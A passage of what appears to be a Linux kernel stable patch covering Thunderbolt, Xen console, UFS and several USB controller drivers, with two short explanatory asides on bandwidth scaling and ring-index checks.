+ #define REG_INMAIL_DATA			0x39900
+ 
+diff --git a/drivers/thunderbolt/quirks.c b/drivers/thunderbolt/quirks.c
+index b5f2ec79c4d6e..ae28a03fa890b 100644
+--- a/drivers/thunderbolt/quirks.c
++++ b/drivers/thunderbolt/quirks.c
+@@ -20,6 +20,12 @@ static void quirk_dp_credit_allocation(struct tb_switch *sw)
+ 	}
+ }
+ 
++static void quirk_clx_disable(struct tb_switch *sw)
++{
++	sw->quirks |= QUIRK_NO_CLX;
++	tb_sw_dbg(sw, "disabling CL states\n");
++}
++
+ struct tb_quirk {
+ 	u16 hw_vendor_id;
+ 	u16 hw_device_id;
+@@ -37,6 +43,13 @@ static const struct tb_quirk tb_quirks[] = {
+ 	 * DP buffers.
+ 	 */
+ 	{ 0x8087, 0x0b26, 0x0000, 0x0000, quirk_dp_credit_allocation },
++	/*
++	 * CLx is not supported on AMD USB4 Yellow Carp and Pink Sardine platforms.
++	 */
++	{ 0x0438, 0x0208, 0x0000, 0x0000, quirk_clx_disable },
++	{ 0x0438, 0x0209, 0x0000, 0x0000, quirk_clx_disable },
++	{ 0x0438, 0x020a, 0x0000, 0x0000, quirk_clx_disable },
++	{ 0x0438, 0x020b, 0x0000, 0x0000, quirk_clx_disable },
+ };
+ 
+ /**
+diff --git a/drivers/thunderbolt/retimer.c b/drivers/thunderbolt/retimer.c
+index 56008eb91e2e4..9cc28197dbc45 100644
+--- a/drivers/thunderbolt/retimer.c
++++ b/drivers/thunderbolt/retimer.c
+@@ -187,6 +187,22 @@ static ssize_t nvm_authenticate_show(struct device *dev,
+ 	return ret;
+ }
+ 
++static void tb_retimer_set_inbound_sbtx(struct tb_port *port)
++{
++	int i;
++
++	for (i = 1; i <= TB_MAX_RETIMER_INDEX; i++)
++		usb4_port_retimer_set_inbound_sbtx(port, i);
++}
++
++static void tb_retimer_unset_inbound_sbtx(struct tb_port *port)
++{
++	int i;
++
++	for (i = TB_MAX_RETIMER_INDEX; i >= 1; i--)
++		usb4_port_retimer_unset_inbound_sbtx(port, i);
++}
++
+ static ssize_t nvm_authenticate_store(struct device *dev,
+ 	struct device_attribute *attr, const char *buf, size_t count)
+ {
+@@ -213,6 +229,7 @@ static ssize_t nvm_authenticate_store(struct device *dev,
+ 	rt->auth_status = 0;
+ 
+ 	if (val) {
++		tb_retimer_set_inbound_sbtx(rt->port);
+ 		if (val == AUTHENTICATE_ONLY) {
+ 			ret = tb_retimer_nvm_authenticate(rt, true);
+ 		} else {
+@@ -232,6 +249,7 @@ static ssize_t nvm_authenticate_store(struct device *dev,
+ 	}
+ 
+ exit_unlock:
++	tb_retimer_unset_inbound_sbtx(rt->port);
+ 	mutex_unlock(&rt->tb->lock);
+ exit_rpm:
+ 	pm_runtime_mark_last_busy(&rt->dev);
+@@ -440,8 +458,7 @@ int tb_retimer_scan(struct tb_port *port, bool add)
+ 	 * Enable sideband channel for each retimer. We can do this
+ 	 * regardless whether there is device connected or not.
+ 	 */
+-	for (i = 1; i <= TB_MAX_RETIMER_INDEX; i++)
+-		usb4_port_retimer_set_inbound_sbtx(port, i);
++	tb_retimer_set_inbound_sbtx(port);
+ 
+ 	/*
+ 	 * Before doing anything else, read the authentication status.
+@@ -464,6 +481,8 @@ int tb_retimer_scan(struct tb_port *port, bool add)
+ 			break;
+ 	}
+ 
++	tb_retimer_unset_inbound_sbtx(port);
++
+ 	if (!last_idx)
+ 		return 0;
+ 
+diff --git a/drivers/thunderbolt/sb_regs.h b/drivers/thunderbolt/sb_regs.h
+index 5185cf3e4d978..f37a4320f10a5 100644
+--- a/drivers/thunderbolt/sb_regs.h
++++ b/drivers/thunderbolt/sb_regs.h
+@@ -20,6 +20,7 @@ enum usb4_sb_opcode {
+ 	USB4_SB_OPCODE_ROUTER_OFFLINE = 0x4e45534c,		/* "LSEN" */
+ 	USB4_SB_OPCODE_ENUMERATE_RETIMERS = 0x4d554e45,		/* "ENUM" */
+ 	USB4_SB_OPCODE_SET_INBOUND_SBTX = 0x5055534c,		/* "LSUP" */
++	USB4_SB_OPCODE_UNSET_INBOUND_SBTX = 0x50555355,		/* "USUP" */
+ 	USB4_SB_OPCODE_QUERY_LAST_RETIMER = 0x5453414c,		/* "LAST" */
+ 	USB4_SB_OPCODE_GET_NVM_SECTOR_SIZE = 0x53534e47,	/* "GNSS" */
+ 	USB4_SB_OPCODE_NVM_SET_OFFSET = 0x53504f42,		/* "BOPS" */
+diff --git a/drivers/thunderbolt/switch.c b/drivers/thunderbolt/switch.c
+index 363d712aa3643..302a73cb03baf 100644
+--- a/drivers/thunderbolt/switch.c
++++ b/drivers/thunderbolt/switch.c
+@@ -2960,8 +2960,6 @@ int tb_switch_add(struct tb_switch *sw)
+ 			dev_warn(&sw->dev, "reading DROM failed: %d\n", ret);
+ 		tb_sw_dbg(sw, "uid: %#llx\n", sw->uid);
+ 
+-		tb_check_quirks(sw);
+-
+ 		ret = tb_switch_set_uuid(sw);
+ 		if (ret) {
+ 			dev_err(&sw->dev, "failed to set UUID\n");
+@@ -2980,6 +2978,8 @@ int tb_switch_add(struct tb_switch *sw)
+ 			}
+ 		}
+ 
++		tb_check_quirks(sw);
++
+ 		tb_switch_default_link_ports(sw);
+ 
+ 		ret = tb_switch_update_link_attributes(sw);
+diff --git a/drivers/thunderbolt/tb.h b/drivers/thunderbolt/tb.h
+index f9786976f5ecf..e11d973a8f9b6 100644
+--- a/drivers/thunderbolt/tb.h
++++ b/drivers/thunderbolt/tb.h
+@@ -23,6 +23,11 @@
+ #define NVM_MAX_SIZE		SZ_512K
+ #define NVM_DATA_DWORDS		16
+ 
++/* Keep link controller awake during update */
++#define QUIRK_FORCE_POWER_LINK_CONTROLLER		BIT(0)
++/* Disable CLx if not supported */
++#define QUIRK_NO_CLX					BIT(1)
++
+ /**
+  * struct tb_nvm - Structure holding NVM information
+  * @dev: Owner of the NVM
+@@ -997,6 +1002,9 @@ static inline bool tb_switch_is_clx_enabled(const struct tb_switch *sw,
+  */
+ static inline bool tb_switch_is_clx_supported(const struct tb_switch *sw)
+ {
++	if (sw->quirks & QUIRK_NO_CLX)
++		return false;
++
+ 	return tb_switch_is_usb4(sw) || tb_switch_is_titan_ridge(sw);
+ }
+ 
+@@ -1212,6 +1220,7 @@ int usb4_port_sw_margin(struct tb_port *port, unsigned int lanes, bool timing,
+ int usb4_port_sw_margin_errors(struct tb_port *port, u32 *errors);
+ 
+ int usb4_port_retimer_set_inbound_sbtx(struct tb_port *port, u8 index);
++int usb4_port_retimer_unset_inbound_sbtx(struct tb_port *port, u8 index);
+ int usb4_port_retimer_read(struct tb_port *port, u8 index, u8 reg, void *buf,
+ 			   u8 size);
+ int usb4_port_retimer_write(struct tb_port *port, u8 index, u8 reg,
+@@ -1254,9 +1263,6 @@ struct usb4_port *usb4_port_device_add(struct tb_port *port);
+ void usb4_port_device_remove(struct usb4_port *usb4);
+ int usb4_port_device_resume(struct usb4_port *usb4);
+ 
+-/* Keep link controller awake during update */
+-#define QUIRK_FORCE_POWER_LINK_CONTROLLER		BIT(0)
+-
+ void tb_check_quirks(struct tb_switch *sw);
+ 
+ #ifdef CONFIG_ACPI
+diff --git a/drivers/thunderbolt/usb4.c b/drivers/thunderbolt/usb4.c
+index 2ed50fcbcca7a..d5cd219ee9e6b 100644
+--- a/drivers/thunderbolt/usb4.c
++++ b/drivers/thunderbolt/usb4.c
+@@ -1578,6 +1578,20 @@ int usb4_port_retimer_set_inbound_sbtx(struct tb_port *port, u8 index)
+ 				    500);
+ }
+ 
++/**
++ * usb4_port_retimer_unset_inbound_sbtx() - Disable sideband channel transactions
++ * @port: USB4 port
++ * @index: Retimer index
++ *
++ * Disables sideband channel transactions on SBTX. The reverse of
++ * usb4_port_retimer_set_inbound_sbtx().
++ */
++int usb4_port_retimer_unset_inbound_sbtx(struct tb_port *port, u8 index)
++{
++	return usb4_port_retimer_op(port, index,
++				    USB4_SB_OPCODE_UNSET_INBOUND_SBTX, 500);
++}
++
+ /**
+  * usb4_port_retimer_read() - Read from retimer sideband registers
+  * @port: USB4 port
+@@ -2067,18 +2081,30 @@ static int usb4_usb3_port_write_allocated_bandwidth(struct tb_port *port,
+ 						    int downstream_bw)
+ {
+ 	u32 val, ubw, dbw, scale;
+-	int ret;
++	int ret, max_bw;
+ 
+-	/* Read the used scale, hardware default is 0 */
+-	ret = tb_port_read(port, &scale, TB_CFG_PORT,
+-			   port->cap_adap + ADP_USB3_CS_3, 1);
++	/* Figure out suitable scale */
++	scale = 0;
++	max_bw = max(upstream_bw, downstream_bw);
++	while (scale < 64) {
++		if (mbps_to_usb3_bw(max_bw, scale) < 4096)
++			break;
++		scale++;
++	}
++
++	if (WARN_ON(scale >= 64))
++		return -EINVAL;
++
++	ret = tb_port_write(port, &scale, TB_CFG_PORT,
++			    port->cap_adap + ADP_USB3_CS_3, 1);
+ 	if (ret)
+ 		return ret;
+ 
+-	scale &= ADP_USB3_CS_3_SCALE_MASK;
+ 	ubw = mbps_to_usb3_bw(upstream_bw, scale);
+ 	dbw = mbps_to_usb3_bw(downstream_bw, scale);
+ 
++	tb_port_dbg(port, "scaled bandwidth %u/%u, scale %u\n", ubw, dbw, scale);
++
+ 	ret = tb_port_read(port, &val, TB_CFG_PORT,
+ 			   port->cap_adap + ADP_USB3_CS_2, 1);
+ 	if (ret)
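Aside: rather than reusing whatever scale the hardware last had, the new code searches for the smallest exponent that keeps the scaled bandwidth below 4096, the largest value the field can hold. A standalone sketch; mbps_to_bw() is a stand-in with an assumed power-of-two granularity, not the driver's real conversion:

#include <stdio.h>

/* assumption: one unit at scale s covers 2^s Mb/s */
static unsigned int mbps_to_bw(unsigned int mbps, unsigned int scale)
{
	return (mbps + (1u << scale) - 1) >> scale;	/* round up */
}

int main(void)
{
	unsigned int up = 20000, down = 40000;
	unsigned int max = up > down ? up : down;
	unsigned int scale = 0;

	while (scale < 64 && mbps_to_bw(max, scale) >= 4096)
		scale++;
	printf("scale=%u ubw=%u dbw=%u\n", scale,
	       mbps_to_bw(up, scale), mbps_to_bw(down, scale));
	return 0;
}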
+diff --git a/drivers/tty/hvc/hvc_xen.c b/drivers/tty/hvc/hvc_xen.c
+index 5bddb2f5e9318..98764e740c078 100644
+--- a/drivers/tty/hvc/hvc_xen.c
++++ b/drivers/tty/hvc/hvc_xen.c
+@@ -43,6 +43,7 @@ struct xencons_info {
+ 	int irq;
+ 	int vtermno;
+ 	grant_ref_t gntref;
++	spinlock_t ring_lock;
+ };
+ 
+ static LIST_HEAD(xenconsoles);
+@@ -89,12 +90,15 @@ static int __write_console(struct xencons_info *xencons,
+ 	XENCONS_RING_IDX cons, prod;
+ 	struct xencons_interface *intf = xencons->intf;
+ 	int sent = 0;
++	unsigned long flags;
+ 
++	spin_lock_irqsave(&xencons->ring_lock, flags);
+ 	cons = intf->out_cons;
+ 	prod = intf->out_prod;
+ 	mb();			/* update queue values before going on */
+ 
+ 	if ((prod - cons) > sizeof(intf->out)) {
++		spin_unlock_irqrestore(&xencons->ring_lock, flags);
+ 		pr_err_once("xencons: Illegal ring page indices");
+ 		return -EINVAL;
+ 	}
+@@ -104,6 +108,7 @@ static int __write_console(struct xencons_info *xencons,
+ 
+ 	wmb();			/* write ring before updating pointer */
+ 	intf->out_prod = prod;
++	spin_unlock_irqrestore(&xencons->ring_lock, flags);
+ 
+ 	if (sent)
+ 		notify_daemon(xencons);
+@@ -146,16 +151,19 @@ static int domU_read_console(uint32_t vtermno, char *buf, int len)
+ 	int recv = 0;
+ 	struct xencons_info *xencons = vtermno_to_xencons(vtermno);
+ 	unsigned int eoiflag = 0;
++	unsigned long flags;
+ 
+ 	if (xencons == NULL)
+ 		return -EINVAL;
+ 	intf = xencons->intf;
+ 
++	spin_lock_irqsave(&xencons->ring_lock, flags);
+ 	cons = intf->in_cons;
+ 	prod = intf->in_prod;
+ 	mb();			/* get pointers before reading ring */
+ 
+ 	if ((prod - cons) > sizeof(intf->in)) {
++		spin_unlock_irqrestore(&xencons->ring_lock, flags);
+ 		pr_err_once("xencons: Illegal ring page indices");
+ 		return -EINVAL;
+ 	}
+@@ -179,10 +187,13 @@ static int domU_read_console(uint32_t vtermno, char *buf, int len)
+ 		xencons->out_cons = intf->out_cons;
+ 		xencons->out_cons_same = 0;
+ 	}
++	if (!recv && xencons->out_cons_same++ > 1) {
++		eoiflag = XEN_EOI_FLAG_SPURIOUS;
++	}
++	spin_unlock_irqrestore(&xencons->ring_lock, flags);
++
+ 	if (recv) {
+ 		notify_daemon(xencons);
+-	} else if (xencons->out_cons_same++ > 1) {
+-		eoiflag = XEN_EOI_FLAG_SPURIOUS;
+ 	}
+ 
+ 	xen_irq_lateeoi(xencons->irq, eoiflag);
+@@ -239,6 +250,7 @@ static int xen_hvm_console_init(void)
+ 		info = kzalloc(sizeof(struct xencons_info), GFP_KERNEL);
+ 		if (!info)
+ 			return -ENOMEM;
++		spin_lock_init(&info->ring_lock);
+ 	} else if (info->intf != NULL) {
+ 		/* already configured */
+ 		return 0;
+@@ -275,6 +287,7 @@ err:
+ 
+ static int xencons_info_pv_init(struct xencons_info *info, int vtermno)
+ {
++	spin_lock_init(&info->ring_lock);
+ 	info->evtchn = xen_start_info->console.domU.evtchn;
+ 	/* GFN == MFN for PV guest */
+ 	info->intf = gfn_to_virt(xen_start_info->console.domU.mfn);
+@@ -325,6 +338,7 @@ static int xen_initial_domain_console_init(void)
+ 		info = kzalloc(sizeof(struct xencons_info), GFP_KERNEL);
+ 		if (!info)
+ 			return -ENOMEM;
++		spin_lock_init(&info->ring_lock);
+ 	}
+ 
+ 	info->irq = bind_virq_to_irq(VIRQ_CONSOLE, 0, false);
+@@ -482,6 +496,7 @@ static int xencons_probe(struct xenbus_device *dev,
+ 	info = kzalloc(sizeof(struct xencons_info), GFP_KERNEL);
+ 	if (!info)
+ 		return -ENOMEM;
++	spin_lock_init(&info->ring_lock);
+ 	dev_set_drvdata(&dev->dev, info);
+ 	info->xbdev = dev;
+ 	info->vtermno = xenbus_devid_to_vtermno(devid);
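Aside: both console rings use free-running 32-bit indices, so the sanity check now serialized by ring_lock leans on unsigned wraparound arithmetic: prod - cons must never exceed the ring size. A userspace model with an illustrative ring size:

#include <stdint.h>
#include <stdio.h>

#define RING_SIZE 1024u		/* stand-in for sizeof(intf->out) */

static int indices_sane(uint32_t cons, uint32_t prod)
{
	return (prod - cons) <= RING_SIZE;	/* wrap-safe in unsigned */
}

int main(void)
{
	printf("%d\n", indices_sane(0xfffffff0u, 0x10u));	/* 1: 32 in use */
	printf("%d\n", indices_sane(0, RING_SIZE + 1));		/* 0: corrupt */
	return 0;
}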
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index 2ddc1aba0ad75..edb93d2c5a781 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -10095,4 +10095,5 @@ module_exit(ufshcd_core_exit);
+ MODULE_AUTHOR("Santosh Yaragnavi <santosh.sy@samsung.com>");
+ MODULE_AUTHOR("Vinayak Holikatti <h.vinayak@samsung.com>");
+ MODULE_DESCRIPTION("Generic UFS host controller driver Core");
++MODULE_SOFTDEP("pre: governor_simpleondemand");
+ MODULE_LICENSE("GPL");
+diff --git a/drivers/usb/cdns3/cdns3-pci-wrap.c b/drivers/usb/cdns3/cdns3-pci-wrap.c
+index deeea618ba33b..1f6320d98a76b 100644
+--- a/drivers/usb/cdns3/cdns3-pci-wrap.c
++++ b/drivers/usb/cdns3/cdns3-pci-wrap.c
+@@ -60,6 +60,11 @@ static struct pci_dev *cdns3_get_second_fun(struct pci_dev *pdev)
+ 			return NULL;
+ 	}
+ 
++	if (func->devfn != PCI_DEV_FN_HOST_DEVICE &&
++	    func->devfn != PCI_DEV_FN_OTG) {
++		return NULL;
++	}
++
+ 	return func;
+ }
+ 
+diff --git a/drivers/usb/cdns3/cdnsp-ep0.c b/drivers/usb/cdns3/cdnsp-ep0.c
+index 9b8325f824992..d63d5d92f2554 100644
+--- a/drivers/usb/cdns3/cdnsp-ep0.c
++++ b/drivers/usb/cdns3/cdnsp-ep0.c
+@@ -403,20 +403,6 @@ static int cdnsp_ep0_std_request(struct cdnsp_device *pdev,
+ 	case USB_REQ_SET_ISOCH_DELAY:
+ 		ret = cdnsp_ep0_set_isoch_delay(pdev, ctrl);
+ 		break;
+-	case USB_REQ_SET_INTERFACE:
+-		/*
+-		 * Add request into pending list to block sending status stage
+-		 * by libcomposite.
+-		 */
+-		list_add_tail(&pdev->ep0_preq.list,
+-			      &pdev->ep0_preq.pep->pending_list);
+-
+-		ret = cdnsp_ep0_delegate_req(pdev, ctrl);
+-		if (ret == -EBUSY)
+-			ret = 0;
+-
+-		list_del(&pdev->ep0_preq.list);
+-		break;
+ 	default:
+ 		ret = cdnsp_ep0_delegate_req(pdev, ctrl);
+ 		break;
+@@ -474,9 +460,6 @@ void cdnsp_setup_analyze(struct cdnsp_device *pdev)
+ 	else
+ 		ret = cdnsp_ep0_delegate_req(pdev, ctrl);
+ 
+-	if (!len)
+-		pdev->ep0_stage = CDNSP_STATUS_STAGE;
+-
+ 	if (ret == USB_GADGET_DELAYED_STATUS) {
+ 		trace_cdnsp_ep0_status_stage("delayed");
+ 		return;
+@@ -484,6 +467,6 @@ void cdnsp_setup_analyze(struct cdnsp_device *pdev)
+ out:
+ 	if (ret < 0)
+ 		cdnsp_ep0_stall(pdev);
+-	else if (pdev->ep0_stage == CDNSP_STATUS_STAGE)
++	else if (!len && pdev->ep0_stage != CDNSP_STATUS_STAGE)
+ 		cdnsp_status_stage(pdev);
+ }
+diff --git a/drivers/usb/cdns3/cdnsp-pci.c b/drivers/usb/cdns3/cdnsp-pci.c
+index efd54ed918b97..7b151f5af3ccb 100644
+--- a/drivers/usb/cdns3/cdnsp-pci.c
++++ b/drivers/usb/cdns3/cdnsp-pci.c
+@@ -29,30 +29,23 @@
+ #define PLAT_DRIVER_NAME	"cdns-usbssp"
+ 
+ #define CDNS_VENDOR_ID		0x17cd
+-#define CDNS_DEVICE_ID		0x0100
++#define CDNS_DEVICE_ID		0x0200
++#define CDNS_DRD_ID		0x0100
+ #define CDNS_DRD_IF		(PCI_CLASS_SERIAL_USB << 8 | 0x80)
+ 
+ static struct pci_dev *cdnsp_get_second_fun(struct pci_dev *pdev)
+ {
+-	struct pci_dev *func;
+-
+ 	/*
+ 	 * Gets the second function.
+-	 * It's little tricky, but this platform has two function.
+-	 * The fist keeps resources for Host/Device while the second
+-	 * keeps resources for DRD/OTG.
++	 * Platform has two functions. The first keeps resources for
++	 * Host/Device while the second keeps resources for DRD/OTG.
+ 	 */
+-	func = pci_get_device(pdev->vendor, pdev->device, NULL);
+-	if (!func)
+-		return NULL;
++	if (pdev->device == CDNS_DEVICE_ID)
++		return  pci_get_device(pdev->vendor, CDNS_DRD_ID, NULL);
++	else if (pdev->device == CDNS_DRD_ID)
++		return pci_get_device(pdev->vendor, CDNS_DEVICE_ID, NULL);
+ 
+-	if (func->devfn == pdev->devfn) {
+-		func = pci_get_device(pdev->vendor, pdev->device, func);
+-		if (!func)
+-			return NULL;
+-	}
+-
+-	return func;
++	return NULL;
+ }
+ 
+ static int cdnsp_pci_probe(struct pci_dev *pdev,
+@@ -230,6 +223,8 @@ static const struct pci_device_id cdnsp_pci_ids[] = {
+ 	  PCI_CLASS_SERIAL_USB_DEVICE, PCI_ANY_ID },
+ 	{ PCI_VENDOR_ID_CDNS, CDNS_DEVICE_ID, PCI_ANY_ID, PCI_ANY_ID,
+ 	  CDNS_DRD_IF, PCI_ANY_ID },
++	{ PCI_VENDOR_ID_CDNS, CDNS_DRD_ID, PCI_ANY_ID, PCI_ANY_ID,
++	  CDNS_DRD_IF, PCI_ANY_ID },
+ 	{ 0, }
+ };
+ 
+diff --git a/drivers/usb/chipidea/ci.h b/drivers/usb/chipidea/ci.h
+index 005c67cb3afb7..f210b7489fd5b 100644
+--- a/drivers/usb/chipidea/ci.h
++++ b/drivers/usb/chipidea/ci.h
+@@ -208,6 +208,7 @@ struct hw_bank {
+  * @in_lpm: if the core in low power mode
+  * @wakeup_int: if wakeup interrupt occur
+  * @rev: The revision number for controller
++ * @mutex: protect code from concurrent running when doing role switch
+  */
+ struct ci_hdrc {
+ 	struct device			*dev;
+@@ -260,6 +261,7 @@ struct ci_hdrc {
+ 	bool				in_lpm;
+ 	bool				wakeup_int;
+ 	enum ci_revision		rev;
++	struct mutex                    mutex;
+ };
+ 
+ static inline struct ci_role_driver *ci_role(struct ci_hdrc *ci)
+diff --git a/drivers/usb/chipidea/core.c b/drivers/usb/chipidea/core.c
+index 27c601296130e..281fc51720cea 100644
+--- a/drivers/usb/chipidea/core.c
++++ b/drivers/usb/chipidea/core.c
+@@ -984,9 +984,16 @@ static ssize_t role_store(struct device *dev,
+ 			     strlen(ci->roles[role]->name)))
+ 			break;
+ 
+-	if (role == CI_ROLE_END || role == ci->role)
++	if (role == CI_ROLE_END)
+ 		return -EINVAL;
+ 
++	mutex_lock(&ci->mutex);
++
++	if (role == ci->role) {
++		mutex_unlock(&ci->mutex);
++		return n;
++	}
++
+ 	pm_runtime_get_sync(dev);
+ 	disable_irq(ci->irq);
+ 	ci_role_stop(ci);
+@@ -995,6 +1002,7 @@ static ssize_t role_store(struct device *dev,
+ 		ci_handle_vbus_change(ci);
+ 	enable_irq(ci->irq);
+ 	pm_runtime_put_sync(dev);
++	mutex_unlock(&ci->mutex);
+ 
+ 	return (ret == 0) ? n : ret;
+ }
+@@ -1030,6 +1038,7 @@ static int ci_hdrc_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	spin_lock_init(&ci->lock);
++	mutex_init(&ci->mutex);
+ 	ci->dev = dev;
+ 	ci->platdata = dev_get_platdata(dev);
+ 	ci->imx28_write_fix = !!(ci->platdata->flags &
+diff --git a/drivers/usb/chipidea/otg.c b/drivers/usb/chipidea/otg.c
+index 622c3b68aa1e6..f5490f2a5b6bc 100644
+--- a/drivers/usb/chipidea/otg.c
++++ b/drivers/usb/chipidea/otg.c
+@@ -167,8 +167,10 @@ static int hw_wait_vbus_lower_bsv(struct ci_hdrc *ci)
+ 
+ void ci_handle_id_switch(struct ci_hdrc *ci)
+ {
+-	enum ci_role role = ci_otg_role(ci);
++	enum ci_role role;
+ 
++	mutex_lock(&ci->mutex);
++	role = ci_otg_role(ci);
+ 	if (role != ci->role) {
+ 		dev_dbg(ci->dev, "switching from %s to %s\n",
+ 			ci_role(ci)->name, ci->roles[role]->name);
+@@ -198,6 +200,7 @@ void ci_handle_id_switch(struct ci_hdrc *ci)
+ 		if (role == CI_ROLE_GADGET)
+ 			ci_handle_vbus_change(ci);
+ 	}
++	mutex_unlock(&ci->mutex);
+ }
+ /**
+  * ci_otg_work - perform otg (vbus/id) event handle
+diff --git a/drivers/usb/dwc2/drd.c b/drivers/usb/dwc2/drd.c
+index d8d6493bc4576..a8605b02115b1 100644
+--- a/drivers/usb/dwc2/drd.c
++++ b/drivers/usb/dwc2/drd.c
+@@ -35,7 +35,8 @@ static void dwc2_ovr_init(struct dwc2_hsotg *hsotg)
+ 
+ 	spin_unlock_irqrestore(&hsotg->lock, flags);
+ 
+-	dwc2_force_mode(hsotg, (hsotg->dr_mode == USB_DR_MODE_HOST));
++	dwc2_force_mode(hsotg, (hsotg->dr_mode == USB_DR_MODE_HOST) ||
++				(hsotg->role_sw_default_mode == USB_DR_MODE_HOST));
+ }
+ 
+ static int dwc2_ovr_avalid(struct dwc2_hsotg *hsotg, bool valid)
+diff --git a/drivers/usb/dwc2/gadget.c b/drivers/usb/dwc2/gadget.c
+index 62fa6378d2d73..8b15742d9e8aa 100644
+--- a/drivers/usb/dwc2/gadget.c
++++ b/drivers/usb/dwc2/gadget.c
+@@ -4549,8 +4549,7 @@ static int dwc2_hsotg_udc_start(struct usb_gadget *gadget,
+ 	hsotg->gadget.dev.of_node = hsotg->dev->of_node;
+ 	hsotg->gadget.speed = USB_SPEED_UNKNOWN;
+ 
+-	if (hsotg->dr_mode == USB_DR_MODE_PERIPHERAL ||
+-	    (hsotg->dr_mode == USB_DR_MODE_OTG && dwc2_is_device_mode(hsotg))) {
++	if (hsotg->dr_mode == USB_DR_MODE_PERIPHERAL) {
+ 		ret = dwc2_lowlevel_hw_enable(hsotg);
+ 		if (ret)
+ 			goto err;
+@@ -4612,8 +4611,7 @@ static int dwc2_hsotg_udc_stop(struct usb_gadget *gadget)
+ 	if (!IS_ERR_OR_NULL(hsotg->uphy))
+ 		otg_set_peripheral(hsotg->uphy->otg, NULL);
+ 
+-	if (hsotg->dr_mode == USB_DR_MODE_PERIPHERAL ||
+-	    (hsotg->dr_mode == USB_DR_MODE_OTG && dwc2_is_device_mode(hsotg)))
++	if (hsotg->dr_mode == USB_DR_MODE_PERIPHERAL)
+ 		dwc2_lowlevel_hw_disable(hsotg);
+ 
+ 	return 0;
+diff --git a/drivers/usb/dwc2/platform.c b/drivers/usb/dwc2/platform.c
+index 23ef759968231..d1589ba7d322d 100644
+--- a/drivers/usb/dwc2/platform.c
++++ b/drivers/usb/dwc2/platform.c
+@@ -91,13 +91,6 @@ static int dwc2_get_dr_mode(struct dwc2_hsotg *hsotg)
+ 	return 0;
+ }
+ 
+-static void __dwc2_disable_regulators(void *data)
+-{
+-	struct dwc2_hsotg *hsotg = data;
+-
+-	regulator_bulk_disable(ARRAY_SIZE(hsotg->supplies), hsotg->supplies);
+-}
+-
+ static int __dwc2_lowlevel_hw_enable(struct dwc2_hsotg *hsotg)
+ {
+ 	struct platform_device *pdev = to_platform_device(hsotg->dev);
+@@ -108,11 +101,6 @@ static int __dwc2_lowlevel_hw_enable(struct dwc2_hsotg *hsotg)
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = devm_add_action_or_reset(&pdev->dev,
+-				       __dwc2_disable_regulators, hsotg);
+-	if (ret)
+-		return ret;
+-
+ 	if (hsotg->clk) {
+ 		ret = clk_prepare_enable(hsotg->clk);
+ 		if (ret)
+@@ -168,7 +156,7 @@ static int __dwc2_lowlevel_hw_disable(struct dwc2_hsotg *hsotg)
+ 	if (hsotg->clk)
+ 		clk_disable_unprepare(hsotg->clk);
+ 
+-	return 0;
++	return regulator_bulk_disable(ARRAY_SIZE(hsotg->supplies), hsotg->supplies);
+ }
+ 
+ /**
+@@ -576,8 +564,7 @@ static int dwc2_driver_probe(struct platform_device *dev)
+ 	dwc2_debugfs_init(hsotg);
+ 
+ 	/* Gadget code manages lowlevel hw on its own */
+-	if (hsotg->dr_mode == USB_DR_MODE_PERIPHERAL ||
+-	    (hsotg->dr_mode == USB_DR_MODE_OTG && dwc2_is_device_mode(hsotg)))
++	if (hsotg->dr_mode == USB_DR_MODE_PERIPHERAL)
+ 		dwc2_lowlevel_hw_disable(hsotg);
+ 
+ #if IS_ENABLED(CONFIG_USB_DWC2_PERIPHERAL) || \
+@@ -608,7 +595,7 @@ error_init:
+ 	if (hsotg->params.activate_stm_id_vb_detection)
+ 		regulator_disable(hsotg->usb33d);
+ error:
+-	if (hsotg->dr_mode != USB_DR_MODE_PERIPHERAL)
++	if (hsotg->ll_hw_enabled)
+ 		dwc2_lowlevel_hw_disable(hsotg);
+ 	return retval;
+ }
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index 3c63fa97a6800..cf5b4f49c3ed8 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -1699,6 +1699,7 @@ static int __dwc3_gadget_get_frame(struct dwc3 *dwc)
+  */
+ static int __dwc3_stop_active_transfer(struct dwc3_ep *dep, bool force, bool interrupt)
+ {
++	struct dwc3 *dwc = dep->dwc;
+ 	struct dwc3_gadget_ep_cmd_params params;
+ 	u32 cmd;
+ 	int ret;
+@@ -1722,10 +1723,13 @@ static int __dwc3_stop_active_transfer(struct dwc3_ep *dep, bool force, bool int
+ 	WARN_ON_ONCE(ret);
+ 	dep->resource_index = 0;
+ 
+-	if (!interrupt)
++	if (!interrupt) {
++		if (!DWC3_IP_IS(DWC3) || DWC3_VER_IS_PRIOR(DWC3, 310A))
++			mdelay(1);
+ 		dep->flags &= ~DWC3_EP_TRANSFER_STARTED;
+-	else if (!ret)
++	} else if (!ret) {
+ 		dep->flags |= DWC3_EP_END_TRANSFER_PENDING;
++	}
+ 
+ 	dep->flags &= ~DWC3_EP_DELAY_STOP;
+ 	return ret;
+@@ -3774,7 +3778,11 @@ void dwc3_stop_active_transfer(struct dwc3_ep *dep, bool force,
+ 	 * enabled, the EndTransfer command will have completed upon
+ 	 * returning from this function.
+ 	 *
+-	 * This mode is NOT available on the DWC_usb31 IP.
++	 * This mode is NOT available on the DWC_usb31 IP.  In this
++	 * case, if the IOC bit is not set, then delay by 1ms
++	 * after issuing the EndTransfer command.  This allows for the
++	 * controller to handle the command completely before DWC3
++	 * remove requests attempts to unmap USB request buffers.
+ 	 */
+ 
+ 	__dwc3_stop_active_transfer(dep, force, interrupt);
+diff --git a/drivers/usb/gadget/function/u_audio.c b/drivers/usb/gadget/function/u_audio.c
+index c1f62e91b0126..4a42574b4a7fe 100644
+--- a/drivers/usb/gadget/function/u_audio.c
++++ b/drivers/usb/gadget/function/u_audio.c
+@@ -1422,7 +1422,7 @@ void g_audio_cleanup(struct g_audio *g_audio)
+ 	uac = g_audio->uac;
+ 	card = uac->card;
+ 	if (card)
+-		snd_card_free(card);
++		snd_card_free_when_closed(card);
+ 
+ 	kfree(uac->p_prm.reqs);
+ 	kfree(uac->c_prm.reqs);
+diff --git a/drivers/usb/misc/onboard_usb_hub.c b/drivers/usb/misc/onboard_usb_hub.c
+index 969c4c4f2ae92..87df27425ec5f 100644
